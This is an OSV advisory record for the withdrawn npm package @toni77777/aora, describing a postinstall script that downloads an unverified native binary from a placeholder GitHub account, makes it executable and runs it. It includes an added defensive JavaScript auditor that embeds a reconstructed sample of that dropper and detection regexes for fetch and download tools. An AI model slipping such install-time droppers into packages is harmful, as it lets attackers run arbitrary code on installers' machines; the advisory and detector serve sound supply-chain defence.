MAL-2026-4458

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@toni77777/aora/MAL-2026-4458.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-4458
Withdrawn
2026-05-26T21:14:22Z
Published
2026-05-21T07:14:49Z
Modified
2026-05-27T00:31:51.701517987Z
Summary
Malicious code in @toni77777/aora (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (8566221a9ab9a1cb01b0f23e2af4b140d2e97310701b8c9a8f4bed1481fb22b2)

On npm install, scripts/postinstall.js fetches a platform-specific executable from https://github.com/yourusername/aora/releases/download/v0.1.0/<asset>, writes it to bin/aora, chmods it 0755, and the package's bin entry then spawns it. The download URL points at GitHub account yourusername — a placeholder that does not match the package publisher (@toni77777). No hash or signature verification is performed on the fetched bytes. Anyone who registers or controls the yourusername GitHub account can upload a release at this path and have arbitrary native code executed on every installer's machine. The script also unconditionally overwrites a ~15 MB native binary shipped in the tarball at bin/aora, so even the locally auditable bytes are replaced at install time. The fetch is not pinned by hash, the publisher does not match the host, and the resulting binary is executed — the canonical install-time dropper shape.
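A defender-side audit of the install-time dropper shape described above, as an added example that is not part of the OSV record or of the package: it takes a package.json and the source of its postinstall script, both constructed here to mirror the advisory (the script body is an assumed reconstruction, not the package's actual file), and reports the unpinned remote fetch, the write-plus-chmod into bin/, the missing hash check and the npm-scope vs GitHub-owner mismatch.

```javascript
// Added example (not from the OSV record or the package): heuristic audit of an
// npm package's install hooks for the "fetch, chmod, execute" dropper shape.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Constructed package.json and postinstall source mirroring the advisory.
// The script body is an assumption of its shape, not the real file.
const samplePkg = {
  name: "@toni77777/aora",
  version: "0.1.0",
  bin: { aora: "bin/aora" },
  scripts: { postinstall: "node scripts/postinstall.js" },
};
const samplePostinstall = `
const https = require("https"), fs = require("fs");
const url = "https://github.com/yourusername/aora/releases/download/v0.1.0/aora-linux-x64";
https.get(url, r => r.pipe(fs.createWriteStream("bin/aora"))
  .on("finish", () => fs.chmodSync("bin/aora", 0o755)));
`;

// Returns a list of human-readable findings; an empty list means nothing flagged.
function auditInstallScript(pkg, scriptSrc) {
  const findings = [];
  const hooks = INSTALL_HOOKS.filter(h => pkg.scripts && pkg.scripts[h]);
  if (hooks.length === 0) return findings; // no lifecycle hook, nothing runs at install
  findings.push(`lifecycle hook(s): ${hooks.join(", ")}`);

  const urls = scriptSrc.match(/https?:\/\/[^\s"'`)]+/g) || [];
  const fetches = /https\.get|fetch\(|curl |wget |request\(/.test(scriptSrc);
  const chmodExec = /chmod(Sync)?\s*\(?[^)]*0o?7[0-7]{2}/.test(scriptSrc) || /\+x/.test(scriptSrc);
  const writesBin = /bin\//.test(scriptSrc);
  // Any sign the downloaded bytes are checked against a pinned digest or signature.
  const verifies = /createHash|sha(256|512)|subtle\.digest|verify\(|integrity/i.test(scriptSrc);

  if (fetches && urls.length) findings.push(`remote fetch: ${urls.join(", ")}`);
  if (writesBin && chmodExec) findings.push("writes into bin/ and sets executable bit");
  if (fetches && !verifies) findings.push("no hash or signature check on downloaded bytes");

  // Publisher/host mismatch: npm scope owner vs GitHub owner in the download URL.
  const scope = (pkg.name.match(/^@([^/]+)\//) || [])[1];
  for (const u of urls) {
    const m = u.match(/^https:\/\/github\.com\/([^/]+)\//);
    if (m && scope && m[1] !== scope) findings.push(`GitHub owner "${m[1]}" != npm scope "${scope}"`);
  }
  // A binary shipped in the tarball is clobbered by the download.
  const binPaths = Object.values(pkg.bin || {});
  if (binPaths.some(p => scriptSrc.includes(p))) findings.push(`overwrites shipped bin entry ${binPaths.join(", ")}`);
  return findings;
}

// The three findings that together make up the dropper shape in the advisory.
function isDropperShape(findings) {
  return findings.some(f => f.startsWith("remote fetch")) &&
         findings.some(f => f.startsWith("no hash")) &&
         findings.some(f => f.startsWith("writes into bin/"));
}
```

Run it against a real package by reading package.json and the hook script from an unpacked tarball; the regexes are heuristics, so treat a hit as a reason to read the script, not as a verdict.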

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-21T07:14:50Z",
            "versions": [
                "0.1.0"
            ],
            "sha256": "32fc2b8f288f10a0be2b2d22a064fb67108338b523f2c2061feef6c44ce5435a",
            "id": "IN-MAL-2026-003769",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:16.776469633Z"
        },
        {
            "import_time": "2026-05-26T05:51:16.659004838Z",
            "versions": [
                "0.1.0"
            ],
            "sha256": "8566221a9ab9a1cb01b0f23e2af4b140d2e97310701b8c9a8f4bed1481fb22b2",
            "id": "IN-MAL-2026-003768",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T07:14:49Z"
        },
        {
            "import_time": "2026-05-26T05:51:16.875345347Z",
            "versions": [
                "0.1.1"
            ],
            "sha256": "f90e1cdb9d4008d1291017a4c52bd33b0d241d4a92e9e009407d6e9600ed35d1",
            "id": "IN-MAL-2026-003770",
            "source": "amazon-inspector",
            "modified_time": "2026-05-21T07:23:41Z"
        },
        {
            "modified_time": "2026-05-21T07:23:41Z",
            "versions": [
                "0.1.1"
            ],
            "sha256": "49d48f678b5f0189d8b6a5cbea0392ddf69d3adc1df4db9a3be69889ecafa87a",
            "id": "IN-MAL-2026-003771",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:17.022889646Z"
        }
    ]
}
References
Credits

Affected packages

npm / @toni77777/aora

Package

Name
@toni77777/aora
Purl
pkg:npm/%40toni77777%2Faora

Affected ranges

Affected versions

0.*
0.1.0
0.1.1

Database specific

indicators
{
    "domains": [
        "github.com"
    ],
    "evidence_files": [
        {
            "sha256": "b14639354d2c0b681679c8c0e59c7b3afcc54ed1c02c06418745791bfe65274c",
            "tlsh": "4d41419d09f30138077240c9da4a1d9bf8578612b34aeb5cf46c43497fdbe2584a26ef",
            "path": "scripts/postinstall.js"
        },
        {
            "sha256": "fe48894538a7da975c0ecd784124001d54376075e5afe1fceb3c341956358e24",
            "tlsh": "baf65d03fab60addd5edcc31851c23377b34b54a432096e72ba49e212e42fa15f78796",
            "path": "bin/aora"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-ShGd14rQs1iX1djS8EPLMNNWkyV1zc4uI6U5+aFS61xlVpjcTH0F1vz/8g3uduycuMOzhBei69wCGE9Qu/YpLg==",
                "sha1": "7000f1f01462e0da8a44611253a1515d14e832df"
            },
            "filename": "aora-0.1.0.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/withdrawn/npm/@toni77777/aora/MAL-2026-4458.json"